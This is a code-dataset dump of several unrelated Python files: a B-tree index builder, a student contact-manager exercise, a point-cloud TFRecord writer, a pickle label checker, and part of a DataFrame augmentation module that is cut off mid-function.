no_aux1.qtd_chaves == qtd:\n split(no_aux1, no.ponteiro_pai, arquivo, qtd, tam)\n return\n else:\n arquivo.seek(no.ponteiro_pai)\n no_aux1.escreve_no(arquivo, qtd, tam)\n # print('Chave inserida na árvore com sucesso. SPLIIIIIIIIIITTTT')\n return\n\ndef insere (chave, raiz, arquivo, qtd, tam):\n no = No()\n ponteiro = raiz\n arquivo.seek(ponteiro)\n no_aux = no.le_no(qtd, tam, arquivo)\n\n if no_aux.qtd_chaves == 0:\n no_aux.insere_chave(chave)\n arquivo.seek(ponteiro)\n no_aux.escreve_no(arquivo, qtd, tam)\n # print('Chave inserida na árvore com sucesso.')\n return\n\n\n for i in range(0, no_aux.qtd_chaves):\n if chave.chave == no_aux.chaves[i].chave:\n # print('Chave já está na árvore.')\n return\n if chave.chave < no_aux.chaves[i].chave:\n if no_aux.chaves[i].ponteiro_no_menor == 0:\n no_aux.insere_chave(chave)\n if no_aux.qtd_chaves < qtd:\n arquivo.seek(ponteiro)\n no_aux.escreve_no(arquivo, qtd, tam)\n # print('Chave inserida na árvore com sucesso.')\n return\n else:\n split(no_aux, ponteiro, arquivo, qtd, tam)\n return\n\n else:\n ponteiro = no_aux.chaves[i].ponteiro_no_menor\n insere(chave, ponteiro, arquivo, qtd, tam)\n return\n\n if chave.chave > no_aux.chaves[no_aux.qtd_chaves - 1].chave:\n if no_aux.ponteiro_no_maior == 0:\n no_aux.insere_chave(chave)\n if no_aux.qtd_chaves < qtd:\n arquivo.seek(ponteiro)\n no_aux.escreve_no(arquivo, qtd, tam)\n # print('Chave inserida na árvore com sucesso.')\n else:\n split(no_aux, ponteiro, arquivo, qtd, tam)\n return\n else:\n ponteiro = no_aux.ponteiro_no_maior\n insere(chave, ponteiro, arquivo, qtd, tam)\n return\n\n\ndef vetor_indices ():\n hash_table = open('hash_table.data', 'rb')\n\n primaria = []\n secundaria = []\n\n bloco = True\n indice = 0\n num_registros = 0\n\n while bloco:\n bloco = hash_table.read(TAMANHO_BLOCO)\n # print(bloco)\n\n if bloco.count(b'\\x00') == TAMANHO_BLOCO:\n indice += 1\n else:\n registro1 = bloco[:TAMANHO_REGISTRO]\n # print(registro1)\n # i = input()\n chaveP = int.from_bytes(registro1[:4], byteorder='big')\n chaveS = registro1[4:304].decode().replace('\\x00', '')\n # print(chaveP, indice, chaveS)\n # i = input()\n # print((chaveP))\n if chaveP != 6711661:\n primaria.append( (chaveP , indice) )\n secundaria.append( (chaveS , indice) )\n # print(primaria, secundaria)\n # i = input()\n num_registros += 1\n else:\n hash_table.close()\n return primaria, secundaria\n\n registro2 = bloco[TAMANHO_REGISTRO : TAMANHO_REGISTRO+TAMANHO_REGISTRO]\n # print(registro2)\n # i = input()\n if not registro2.count(b'\\x00') == TAMANHO_REGISTRO:\n # if not registro2[:4] == b'\\x00\\x00\\x00\\x00' and not registro2[:4] == '':\n chaveP = int.from_bytes(registro2[:4], byteorder='big')\n chaveS = registro2[4:304].decode().replace('\\x00', '')\n # print(chaveS, chaveP)\n # i = input()\n primaria.append((chaveP, indice))\n secundaria.append((chaveS, indice))\n # print(primaria, secundaria)\n # i = input()\n num_registros += 1\n\n # a = input()\n # if indice == 999999:\n # break\n indice += 1\n\ndef main():\n a = vetor_indices()\n\n arvorePrimaria = ArvoreB(340)\n arvoreSecundaria = ArvoreB(24)\n arvP = open('arvore_indice_primario.data', 'wb+')\n arvS = open('arvore_indice_secundario.data', 'wb+')\n arvorePrimaria.escreve_arvore(arvP, arvorePrimaria.qtd_chaves_bloco, 4)\n arvoreSecundaria.escreve_arvore(arvS, arvoreSecundaria.qtd_chaves_bloco, 300)\n\n\n for c in a[0]:\n chave = Chave(c[0], c[1])\n insere(chave, arvorePrimaria.get_no_raiz(), arvP, arvorePrimaria.qtd_chaves_bloco, 4)\n\n for c in a[1]:\n chave = Chave(c[0], c[1])\n insere(chave, arvoreSecundaria.get_no_raiz(), arvS, arvoreSecundaria.qtd_chaves_bloco, 300)\n\ndef consulta_titulo ():\n arv = open('arvore_indice_secundario.data', 'rb')\n hash = open('hash_table.data', 'rb')\n busca = input()\n busca = busca.encode()\n busca_titulo(busca, 4096, arv, hash, 0, 24, 300)\n hash.close()\n arv.close()\n\ndef consulta_id ():\n arv = open('arvore_indice_primaria.data', 'rb')\n hash = open('hash_table.data', 'rb')\n busca = input()\n busca = int(busca)\n busca_id(busca, 4096, arv, hash, 0, 340, 4)\n hash.close()\n arv.close()","sub_path":"arvore.py","file_name":"arvore.py","file_ext":"py","file_size_in_byte":17410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"114167924","text":"\"\"\"\nID:303893416\nFull Name : Yigal.O\n\"\"\"\n\nimport re # to check correct email pattern\n\n# you can see that i some how get regex at leats for this part\n# example shows: itzik@Cohen-Dev.co.il i.e. we have the '-' between '@' and '.'\n# so one of the following should be appropriate\n# global_p = re.compile('[a-zA-Z0-9]+@[a-zA-Z]+\\.[a-zA-Z]+')\nglobal_p = re.compile('.*@.*\\..*')\n\n\nclass Contacts:\n def __init__(self, olderContact=None):\n self.CopyAttributes(olderContact)\n self.ReadValues()\n\n def CopyAttributes(self, olderContact=None):\n if olderContact:\n if isinstance(olderContact, Contacts):\n self.name = olderContact.name\n if hasattr(olderContact, \"cellphone\"):\n self.cellphone = olderContact.cellphone\n\n def ReadValues(self):\n inputVal = None\n while True:\n if hasattr(self, \"name\"):\n oldAttr = self.name\n inputVal = input(\"Name({0}):\".format(oldAttr))\n if inputVal == '':\n self.name = oldAttr\n break\n else:\n self.name = inputVal\n break\n else:\n inputVal = input(\"Name:\")\n if inputVal == '':\n print(\"#\\nMyError: Name cant be empty#\\nTry again pls...\\n#\")\n else:\n self.name = inputVal\n break\n while True:\n if hasattr(self, \"cellphone\"):\n oldAttr = self.cellphone\n inputVal = input(\"Cell Phone({0}):\".format(oldAttr))\n if inputVal == '':\n self.cellphone = oldAttr\n break\n elif inputVal == 'x':\n del self.cellphone\n break\n elif not inputVal.isdigit():\n print(\"#\\nMyError: Cell Phone should contain digits only#\\nTry again pls...\\n#\")\n else:\n self.cellphone = inputVal\n break\n else:\n inputVal = input(\"Cell Phone:\")\n if inputVal == '':\n break\n elif not inputVal.isdigit():\n print(\"#\\nMyError: Cell Phone should contain digits only#\\nTry again pls...\\n#\")\n else:\n self.cellphone = inputVal\n break\n\n def GetMyAttrStrs(self):\n # assumption all inputs(i.e. instance variables) are strings!, in other cases if will come we should add conditions.\n # for the following list compr' is not clear..\n myAttrList = []\n for s in dir(self):\n if not s.startswith('__'):\n attr = self.__getattribute__(s)\n if isinstance(attr, str):\n myAttrList.append(s)\n return myAttrList\n\n def Match(self, dataStr):\n local_p = re.compile(dataStr)\n my_Attr_str_list = self.GetMyAttrStrs()\n for attr_str in my_Attr_str_list:\n m = local_p.search(self.__getattribute__(attr_str))\n if m:\n return True\n return False\n\n def __lt__(self, other):\n if self.name < other.name:\n return True\n else:\n return False\n\n def __str__(self):\n myStr = \"Name: \" + self.name\n if hasattr(self, \"cellphone\"):\n myStr += \", Cell Phone: \" + self.cellphone\n return myStr\n\n\nclass FriendContact(Contacts):\n def __init__(self, olderContact=None):\n self.CopyAttributes(olderContact)\n self.ReadValues()\n\n def CopyAttributes(self, olderContact=None):\n super().CopyAttributes(olderContact)\n if olderContact:\n if isinstance(olderContact, FriendContact):\n if hasattr(olderContact, \"homePhone\"):\n self.homePhone = olderContact.homePhone\n if hasattr(olderContact, \"personalEmail\"):\n self.personalEmail = olderContact.personalEmail\n\n def ReadValues(self):\n super().ReadValues() # the MRO call from here as i understood from Ronen\n inputVal = None\n while True:\n if hasattr(self, \"homePhone\"):\n oldAttr = self.homePhone\n inputVal = input(\"Home Phone({0}):\".format(oldAttr))\n if inputVal == '':\n self.homePhone = oldAttr\n break\n elif inputVal == 'x':\n del self.homePhone\n break\n elif not inputVal.isdigit():\n print(\"#\\nMyError: Home Phone should contain digits only#\\nTry again pls...\\n#\")\n else:\n self.homePhone = inputVal\n break\n else:\n inputVal = input(\"Home Phone:\")\n if inputVal == '':\n break\n elif not inputVal.isdigit():\n print(\"#\\nMyError: Home Phone should contain digits only#\\nTry again pls...\\n#\")\n else:\n self.homePhone = inputVal\n break\n while True:\n if hasattr(self, \"personalEmail\"):\n oldAttr = self.personalEmail\n inputVal = input(\"Personal Email({0}):\".format(oldAttr))\n if inputVal == '':\n self.personalEmail = oldAttr\n break\n elif inputVal == 'x':\n del self.personalEmail\n break\n elif global_p.match(inputVal) == None:\n print(\"#\\nMyError: Personal Email format is incorrect#\\nTry again pls...\\n#\")\n else:\n self.personalEmail = inputVal\n break\n else:\n inputVal = input(\"Personal Email:\")\n if inputVal == '':\n break\n elif global_p.match(inputVal) == None:\n print(\"#\\nMyError: Personal Email format is incorrect#\\nTry again pls...\\n#\")\n else:\n self.personalEmail = inputVal\n break\n\n def GetMyStr(self):\n myStr = \"\"\n if hasattr(self, \"homePhone\"):\n myStr += \"Home Phone: \" + self.homePhone\n if hasattr(self, \"personalEmail\"):\n myStr += \", Personal Email: \" + self.personalEmail\n elif hasattr(self, \"personalEmail\"):\n myStr += \"Personal Email: \" + self.personalEmail\n return myStr\n\n def __str__(self):\n return Contacts.__str__(self) + \", \" + self.GetMyStr()\n\n\nclass ProfessionalContact(Contacts):\n def __init__(self, olderContact=None):\n self.CopyAttributes(olderContact)\n self.ReadValues()\n\n def CopyAttributes(self, olderContact=None):\n super().CopyAttributes(olderContact)\n if olderContact:\n if isinstance(olderContact, ProfessionalContact):\n if hasattr(olderContact, \"workPhone\"):\n self.workPhone = olderContact.workPhone\n if hasattr(olderContact, \"workEmail\"):\n self.workEmail = olderContact.workEmail\n\n def ReadValues(self):\n super().ReadValues() # the MRO call from here as i understood from Ronen\n inputVal = None\n while True:\n if hasattr(self, \"workPhone\"):\n oldAttr = self.workPhone\n inputVal = input(\"Work Phone({0}):\".format(oldAttr))\n if inputVal == '':\n self.workPhone = oldAttr\n break\n elif inputVal == 'x':\n del self.workPhone\n break\n elif not inputVal.isdigit():\n print(\"#\\nMyError: Work Phone should contain digits only#\\nTry again pls...\\n#\")\n else:\n self.workPhone = inputVal\n break\n else:\n inputVal = input(\"Work Phone:\")\n if inputVal == '':\n break\n elif not inputVal.isdigit():\n print(\"#\\nMyError: Work Phone should contain digits only#\\nTry again pls...\\n#\")\n else:\n self.workPhone = inputVal\n break\n while True:\n if hasattr(self, \"workEmail\"):\n oldAttr = self.workEmail\n inputVal = input(\"Work Email({0}):\".format(oldAttr))\n if inputVal == '':\n self.workEmail = oldAttr\n break\n elif inputVal == 'x':\n del self.workEmail\n break\n elif global_p.match(inputVal) == None:\n print(\"#\\nMyError: Work Email format is incorrect#\\nTry again pls...\\n#\")\n else:\n self.workEmail = inputVal\n break\n else:\n inputVal = input(\"Work Email:\")\n if inputVal == '':\n break\n elif global_p.match(inputVal) == None:\n print(\"#\\nMyError: Work Email format is incorrect#\\nTry again pls...\\n#\")\n else:\n self.workEmail = inputVal\n break\n\n def GetMyStr(self):\n myStr = \"\"\n if hasattr(self, \"workPhone\"):\n myStr += \"Work Phone: \" + self.workPhone\n if hasattr(self, \"workEmail\"):\n myStr += \", Work Email: \" + self.workEmail\n elif hasattr(self, \"workEmail\"):\n myStr += \"Work Email: \" + self.workEmail\n return myStr\n\n def __str__(self):\n return Contacts.__str__(self) + \", \" + self.GetMyStr()\n\n\nclass ProfessionalFriendContact(FriendContact, ProfessionalContact):\n def __init__(self, olderContact=None):\n # i could construct this class as the others classes of type contacts only to show the use of the ReadValues(..)\n # method, but it seems a little bit to much. so here we have the super proxy using the MRO and in the\n # other classes we have the use of ReadValues(..) as requested!\n # pls notice that we dont even need a c'tor here!! , and it is here only for clarity at least for me..\n super().__init__(olderContact)\n\n def __str__(self):\n return FriendContact.__str__(self) + \", \" + ProfessionalContact.GetMyStr(self)\n","sub_path":"Course Programming Languages/Python workPlace/תרגילי הגשה 2016/2/Ex_2/contact.py","file_name":"contact.py","file_ext":"py","file_size_in_byte":10475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287251617","text":"import tensorflow as tf\n\nimport os\nimport cv2\nimport numpy as np\nimport math\nimport pdb\n\nfrom plyfile import PlyData, PlyElement\nimport json\n\nfrom utils import getDensity, drawDensityImage\n\n\n\ndef _bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef _float_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=value))\n\n\ndef read_scene_pc(file_path):\n with open(file_path, 'rb') as f:\n plydata = PlyData.read(f)\n dtype = plydata['vertex'].data.dtype\n print('dtype of file{}: {}'.format(file_path, dtype))\n\n points_data = np.array(plydata['vertex'].data.tolist())\n\n return points_data\n\n\ndef write_scene_pc(points, output_path):\n vertex = np.array([tuple(x) for x in points],\n dtype=[('x', 'f4'), ('y', 'f4'), ('z', 'f4'), ('red', 'u1'), ('green', 'u1'), ('blue', 'u1'), ])\n vertex_el = PlyElement.describe(vertex, 'vertex')\n PlyData([vertex_el]).write(output_path) # write the new ply file\n\n\nclass RecordWriter:\n def __init__(self, num_points, base_dir, phase, im_size, max_num_corners=300):\n self.num_points = num_points\n self.base_dir = base_dir\n self.ply_base_dir = os.path.join(self.base_dir, 'ply')\n self.annot_base_dir = os.path.join(self.base_dir, 'json')\n self.phase = phase\n self.im_size = im_size # HEIGHT, WIDTH = SIZE\n self.max_num_corners = max_num_corners\n\n self.ply_paths, self.annot_paths = self.get_filepaths()\n\n self.writer = tf.python_io.TFRecordWriter(self.base_dir + '_' + self.phase + '.tfrecords')\n\n def get_filepaths(self):\n ply_filenames = sorted(os.listdir(self.ply_base_dir))\n json_filenames = sorted(os.listdir(self.annot_base_dir))\n\n assert len(ply_filenames) == len(json_filenames)\n ply_file_paths = [os.path.join(self.ply_base_dir, filename) for filename in ply_filenames]\n annot_file_paths = [os.path.join(self.annot_base_dir, filename) for filename in json_filenames]\n\n return ply_file_paths, annot_file_paths\n\n def write(self):\n for ply_file_path, annot_file_path in zip(self.ply_paths, self.annot_paths):\n self.write_example(ply_file_path, annot_file_path)\n\n def write_example(self, ply_path, annot_path):\n points = read_scene_pc(ply_path)\n\n xyz = points[:, :3]\n\n mins = xyz.min(0, keepdims=True)\n maxs = xyz.max(0, keepdims=True)\n\n max_range = (maxs - mins)[:, :2].max()\n padding = max_range * 0.05\n \n mins = (maxs + mins) / 2 - max_range / 2\n mins -= padding\n max_range += padding * 2\n\n xyz = (xyz - mins) / max_range\n\n new_points = np.concatenate([xyz, points[:, 3:6]], axis=1)\n points = new_points\n\n if points.shape[0] < self.num_points:\n indices = np.arange(points.shape[0])\n points = np.concatenate([points, points[np.random.choice(indices, self.num_points - points.shape[0])]], axis=0)\n else:\n sampled_indices = np.arange(points.shape[0])\n np.random.shuffle(sampled_indices)\n points = points[sampled_indices[:self.num_points]]\n\n # For testing purpose: draw the density image to check the quality\n filename, _ = os.path.splitext(os.path.basename(ply_path))\n write_scene_pc(points, './debug/{}.ply'.format(filename))\n density_img = drawDensityImage(getDensity(points=points))\n cv2.imwrite('./debug/{}_density.png'.format(filename), density_img)\n\n density_img = np.stack([density_img]*3, axis=2)\n annot_image = self.parse_annot(density_img, annot_path, mins, max_range)\n cv2.imwrite('./debug/{}_annot.png'.format(filename), annot_image)\n\n\n\n # points[:, 3:] = points[:, 3:] / 255 - 0.5\n\n # coordinates = np.clip(np.round(points[:, :2] * self.im_size).astype(np.int32), 0, self.im_size - 1)\n\n # points_indices = self.get_projection_indices(coordinates)\n\n # # prepare other g.t. related inputs to be zeros for now\n\n # corner_gt = np.zeros([self.max_num_corners, 3], dtype=np.int64)\n\n # num_corners = 0\n\n # icon_segmentation = np.zeros((self.im_size, self.im_size), dtype=np.uint8)\n\n # room_segmentation = np.zeros((self.im_size, self.im_size), dtype=np.uint8)\n\n # flags = np.zeros(2, np.int64)\n # flags[0] = 1\n # flags[1] = 0\n\n # example = tf.train.Example(features=tf.train.Features(feature={\n # 'image_path': _bytes_feature(file_path),\n # 'points': _float_feature(points.reshape(-1)),\n # 'point_indices': _int64_feature(points_indices.reshape(-1)),\n # 'corner': _int64_feature(corner_gt.reshape(-1)),\n # 'num_corners': _int64_feature([num_corners]),\n # 'icon': _bytes_feature(icon_segmentation.tostring()),\n # 'room': _bytes_feature(room_segmentation.tostring()),\n # 'flags': _int64_feature(flags),\n # }))\n\n # self.writer.write(example.SerializeToString())\n\n def get_projection_indices(self, coordinates):\n indices_map = np.zeros([self.num_points], dtype=np.int64)\n for i, coord in enumerate(coordinates):\n x, y = coord\n indices_map[i] = y * self.im_size + x\n return indices_map\n\n def parse_annot(self, img, file_path, mins, max_range):\n with open(file_path, 'r') as f:\n data = json.load(f)\n\n points = data['points']\n lines = data['lines']\n line_items = data['lineItems']\n areas = data['areas']\n \n point_dict = dict()\n \n for point in points:\n point_dict[point['id']] = point\n\n line_dict = dict()\n for line in lines:\n line_dict[line['id']] = line\n\n # img = np.zeros([self.im_size, self.im_size, 3], dtype=np.uint8)\n\n min_x = mins[0][0]\n min_y = mins[0][1]\n width = height = max_range\n\n # draw all corners\n for point in points:\n img_x, img_y = self._draw_corner_with_scaling(img, (point['x'], point['y']), min_x, width, min_y, height)\n point_dict[point['id']]['img_x'] = img_x\n point_dict[point['id']]['img_y'] = img_y\n \n # draw all line segments\n for line in lines:\n assert len(line['points']) == 2\n point_id_1, point_id_2 = line['points']\n start_pt = (point_dict[point_id_1]['img_x'], point_dict[point_id_1]['img_y'])\n end_pt = (point_dict[point_id_2]['img_x'], point_dict[point_id_2]['img_y'])\n # line_dict[line['id']]['img_start_pt'] = start_pt\n # line_dict[line['id']]['img_end_pt'] = end_pt\n cv2.line(img, start_pt, end_pt, (255,0,0))\n\n # draw all line with labels, such as doors, windows\n for line_item in line_items:\n start_pt = (line_item['startPointAt']['x'], line_item['startPointAt']['y'])\n end_pt = (line_item['endPointAt']['x'], line_item['endPointAt']['y'])\n img_start_pt = self._draw_corner_with_scaling(img, start_pt, min_x, width, min_y, height, color=(0,255,0))\n img_end_pt = self._draw_corner_with_scaling(img, end_pt, min_x, width, min_y, height, color=(0,255,0))\n cv2.line(img, img_start_pt, img_end_pt, (0, 255, 255))\n cv2.putText(img, line_item['is'], (img_start_pt[0], img_start_pt[1]-5), cv2.FONT_HERSHEY_SIMPLEX, 0.3, (255,255,255), 1)\n\n print(len(areas))\n return img\n\n def _draw_corner_with_scaling(self, img, corner, min_x, width, min_y, height, color=(0,0,255)):\n img_x = int(math.floor((corner[0] - min_x) * 1.0 / width * self.im_size))\n img_y = int(math.floor((corner[1] - min_y) * 1.0 / height * self.im_size))\n cv2.circle(img, (img_x,img_y), 2, color, -1)\n return img_x, img_y\n\n\n\nif __name__ == '__main__':\n base_dir = '/local-scratch/cjc/Lianjia-inverse-cad/FloorNet/data/first_500/processed_test'\n record_writer = RecordWriter(num_points=50000, base_dir=base_dir, phase='test', im_size=256)\n record_writer.write()\n\n","sub_path":"RecordWriterLianjia.py","file_name":"RecordWriterLianjia.py","file_ext":"py","file_size_in_byte":8227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"131248169","text":"import pickle\n\nwith open('label_facebook_computed', 'rb') as f1:\n\tcomputed = pickle.load(f1)\nfor i in range (100):\n\tdata = computed[(40*i):(40*i+40)]\n\tprint(data)\n\n\n# with open('computed_label', 'rb') as f1:\n# \tcomputed = pickle.load(f1)\n# computed -= 1\n# for i in range (400):\n# \tdata = computed[(10*i):(10*i+10)]\n# \tfor j in range(10):\n# \t\tif data[j] == -1:\n# \t\t\tdata[j] += 3\n# \tprint(data)","sub_path":"check_accuracy.py","file_name":"check_accuracy.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"438148970","text":"import numpy as np\nimport pandas as pd\n\nfrom collections import namedtuple\nfrom sklearn.decomposition import NMF, PCA\n\nfrom ...core.config import CONFIG_DATASET_AUGMENT\nfrom ...core.log import MlLog\nfrom ...util.counter_dim import CounterDimIncreasing\nfrom .df_normalize import DfNormalize\nfrom .methods_fields import FieldsParams\n\n\nDEFAULT_ORDER = 2\n\n\ndef _parse_base(base):\n \"\"\" Initialize operations \"\"\"\n if base is None:\n return np.log(2)\n elif base == 'e':\n return 1.0\n else:\n return np.log(base)\n\n\nclass DfAugment(MlLog):\n \"\"\"\n DataFrame augmentation\n \"\"\"\n\n def __init__(self, df, config, outputs, model_type, set_config=True):\n super().__init__(config, CONFIG_DATASET_AUGMENT)\n self.config = config\n self.df = df\n self.dfs = list()\n self.outputs = outputs\n self.model_type = model_type\n self.add = dict()\n self.sub = dict()\n self.div = dict()\n self.log_ratio = dict()\n self.logp1_ratio = dict()\n self.mult = dict()\n self.nmf = dict()\n self.pca = dict()\n self.__dict__['and'] = dict() # Writing 'self.and' is a sysntax error\n if set_config:\n self._set_from_config()\n\n def augment(self, name, augmenter):\n \"\"\" Use an 'augmenter' object to add coluns to the dataFrame \"\"\"\n ret = augmenter()\n if ret is None:\n self._debug(f\"Augment dataframe: Could not do {name}\")\n return False\n else:\n self.dfs.append(ret)\n return True\n\n def __call__(self):\n \"\"\"\n Augment dataframe\n Returns a new (augmented) dataset\n \"\"\"\n if not self.enable:\n self._debug(f\"Augment dataframe disabled, skipping. Config file '{self.config.config_file}', section '{CONFIG_DATASET_AUGMENT}', enable='{self.enable}'\")\n return self.df\n cols = \"', '\".join([c for c in self.df.columns])\n self._info(f\"Augment dataframe: Start. Shape: {self.df.shape}. Fields ({len(self.df.columns)}): ['{cols}']\")\n self._op_add()\n self._op_and()\n self._op_div()\n self._op_log_ratio()\n self._op_logp1_ratio()\n self._op_mult()\n self._op_sub()\n self._nmf()\n self._pca()\n if len(self.dfs) > 0:\n to_join = [self.df]\n to_join.extend(self.dfs)\n df_joined = pd.concat(to_join, axis=1)\n self._info(f\"Augment dataframe: DataFrame has shape {self.df.shape}, results have shapes {[ret.shape for ret in self.dfs]}\")\n self.df = df_joined\n cols = \"', '\".join([c for c in self.df.columns])\n self._info(f\"Augment dataframe: End. Shape: {self.df.shape}. Fields ({len(self.df.columns)}): ['{cols}']\")\n return self.df\n\n def __getstate__(self):\n \" Do not pickle any '_augment' objects \"\n state = self.__dict__.copy()\n to_delete = [k for k in state.keys() if k.endswith('_augment')]\n for k in to_delete:\n del state[k]\n return state\n\n def _op_add(self):\n self.add_augment = DfAugmentOpAdd(self.df, self.config, self.outputs, self.model_type)\n return self.augment('add', self.add_augment)\n\n def _op_and(self):\n self.and_augment = DfAugmentOpAnd(self.df, self.config, self.outputs, self.model_type)\n return self.augment('and', self.and_augment)\n\n def _op_div(self):\n self.divide_augment = DfAugmentOpDiv(self.df, self.config, self.outputs, self.model_type)\n return self.augment('div', self.divide_augment)\n\n def _op_mult(self):\n self.multiply_augment = DfAugmentOpMult(self.df, self.config, self.outputs, self.model_type)\n return self.augment('mult', self.multiply_augment)\n\n def _op_log_ratio(self):\n self.log_ratio_augment = DfAugmentOpLogRatio(self.df, self.config, self.outputs, self.model_type)\n return self.augment('log_ratio', self.log_ratio_augment)\n\n def _op_logp1_ratio(self):\n self.logp1_ratio_augment = DfAugmentOpLogPlusOneRatio(self.df, self.config, self.outputs, self.model_type)\n return self.augment('logp1_ratio', self.logp1_ratio_augment)\n\n def _op_sub(self):\n self.sub_augment = DfAugmentOpSub(self.df, self.config, self.outputs, self.model_type)\n return self.augment('sub', self.sub_augment)\n\n def _nmf(self):\n self.nmf_augment = DfAugmentNmf(self.df, self.config, self.outputs, self.model_type)\n return self.augment('NMF', self.nmf_augment)\n\n def _pca(self):\n self.pca_augment = DfAugmentPca(self.df, self.config, self.outputs, self.model_type)\n return self.augment('PCA', self.pca_augment)\n\n\nclass DfAugmentOpBinary(FieldsParams):\n \"\"\"\n Augment dataset by adding \"binary operations\" between two fields (e.g. difference,\n ratio, log ratio, etc.)\n \"\"\"\n\n def __init__(self, df, config, subsection, outputs, model_type, params=None, madatory_params=None):\n super().__init__(df, config, CONFIG_DATASET_AUGMENT, subsection, df.columns, outputs, params, madatory_params)\n self.operation_name = subsection\n self.symmetric = True\n self.min_non_zero_count = 1\n self.order = 2\n\n def calc(self, namefieldparams, x):\n \"\"\"Calculate the operation on pairwise fields from dataframe\n Returns: A dataframe of 'operations' (None on failure)\n \"\"\"\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Start, name={namefieldparams.name}, params={namefieldparams.params}, fields:{namefieldparams.fields}\")\n results = list()\n skip_second = set()\n self._op_init(namefieldparams)\n cols = list()\n for i in range(len(namefieldparams.fields)):\n field_i = namefieldparams.fields[i]\n if not self.can_apply_first(field_i):\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Cannot apply operation '{self.operation_name}' to first field '{field_i}', skipping\")\n continue\n for j in range(len(namefieldparams.fields)):\n if i == j:\n continue\n if self.symmetric and i > j:\n continue\n field_j = namefieldparams.fields[j]\n if field_j in skip_second:\n continue\n if not self.can_apply_second(field_j):\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Cannot apply operation '{self.operation_name}' to second field '{field_j}', skipping\")\n skip_second.add(field_j)\n continue\n res = self.op(field_i, field_j)\n if self.should_add(field_i, field_j, res):\n cols.append(f\"{namefieldparams.name}_{field_i}_{field_j}\")\n results.append(res)\n else:\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Should add returned False, skipping\")\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': End\")\n if len(results) > 0:\n x = np.concatenate(results)\n x = x.reshape(-1, len(results))\n df = self.array_to_df(x, cols)\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': DataFrame joined shape {df.shape}\")\n return df\n return None\n\n def can_apply_first(self, field):\n \"\"\" Can we apply the operation 'op(field_1, field_2) to the first fild 'field_1'? \"\"\"\n return True\n\n def can_apply_second(self, field):\n \"\"\" Can we apply the operation 'op(field_1, field_2) to the second fild 'field_2'? \"\"\"\n return True\n\n def op(self, field_i, field_j):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n raise NotImplementedError(\"Unimplemented method, this method should be overiden by a subclass!\")\n\n def _op_init(self, namefieldparams):\n \"\"\" Initialize operations \"\"\"\n min_non_zero = namefieldparams.params.get('min_non_zero')\n if min_non_zero is not None:\n if min_non_zero < 0.0:\n self._error(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Illegal value for 'min_non_zero'={min_non_zero}, ignoring\")\n if 0.0 < min_non_zero and min_non_zero < 1.0:\n self.min_non_zero_count = int(min_non_zero * len(self.df))\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}, min_non_zero: {min_non_zero}, len(df): {len(self.df)}\")\n else:\n self.min_non_zero_count = int(min_non_zero)\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Setting min_non_zero_count={self.min_non_zero_count}\")\n\n def should_add(self, field_i, field_j, x):\n \"\"\" Should we add add these results \"\"\"\n count_non_zero = (x != 0.0).sum()\n ok = count_non_zero >= self.min_non_zero_count\n if not ok:\n self._debug(f\"Calculating {self.operation_name}, fields {field_i}, {field_j}: Minimum number of non-zero fields is {self.min_non_zero_count}, but there are only {count_non_zero} non-zeros. Not adding column\")\n return ok\n\n\nclass DfAugmentOpNary(FieldsParams):\n \"\"\"\n Augment dataset by adding \"N-ary operations\" between (two or more) fields (e.g. sum)\n \"\"\"\n\n def __init__(self, df, config, subsection, outputs, model_type, params=None, madatory_params=None):\n super().__init__(df, config, CONFIG_DATASET_AUGMENT, subsection, df.columns, outputs, params, madatory_params)\n self.operation_name = subsection\n self.min_non_zero_count = 1\n self.order = DEFAULT_ORDER\n\n def calc(self, namefieldparams, x):\n \"\"\"\n Calculate the operation on N fields from dataframe\n Returns: A dataframe of 'operations' (None on failure)\n \"\"\"\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Start, name={namefieldparams.name}, params={namefieldparams.params}, fields:{namefieldparams.fields}\")\n results = list()\n self._op_init(namefieldparams)\n cols = list()\n counter = CounterDimIncreasing(len(namefieldparams.fields), self.order)\n count, count_added, count_skipped = 1, 0, 0\n for nums in counter:\n fields = [namefieldparams.fields[i] for i in nums]\n res = self.op(fields)\n count += 1\n if self.should_add(fields, res):\n count_added += 1\n cols.append(f\"{namefieldparams.name}_{'_'.join(fields)}\")\n results.append(res)\n else:\n count_skipped += 1\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Fields {fields}. Should add returned False, skipping\")\n if count % 100 == 0:\n self._info(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': Minimum non-zero: {self.min_non_zero_count}, count {count}, added {count_added}, skipped {count_skipped}\")\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': End\")\n if len(results) > 0:\n x = np.concatenate(results)\n x = x.reshape(-1, len(results))\n df = self.array_to_df(x, cols)\n self._debug(f\"Calculating {self.operation_name}, name: '{namefieldparams.name}': DataFrame joined shape {df.shape}\")\n return df\n return None\n\n def op(self, fields):\n \"\"\" Calculate the arithmetic operation between the two fields \"\"\"\n raise NotImplementedError(\"Unimplemented method, this method should be overiden by a subclass!\")\n\n def _op_init(self, namefieldparams):\n \"\"\" Initialize operations \"\"\"\n min_non_zero = namefieldparams.params.get('min_non_zero')\n if min_non_zero is not None:\n if min_non_zero < 0.0:\n 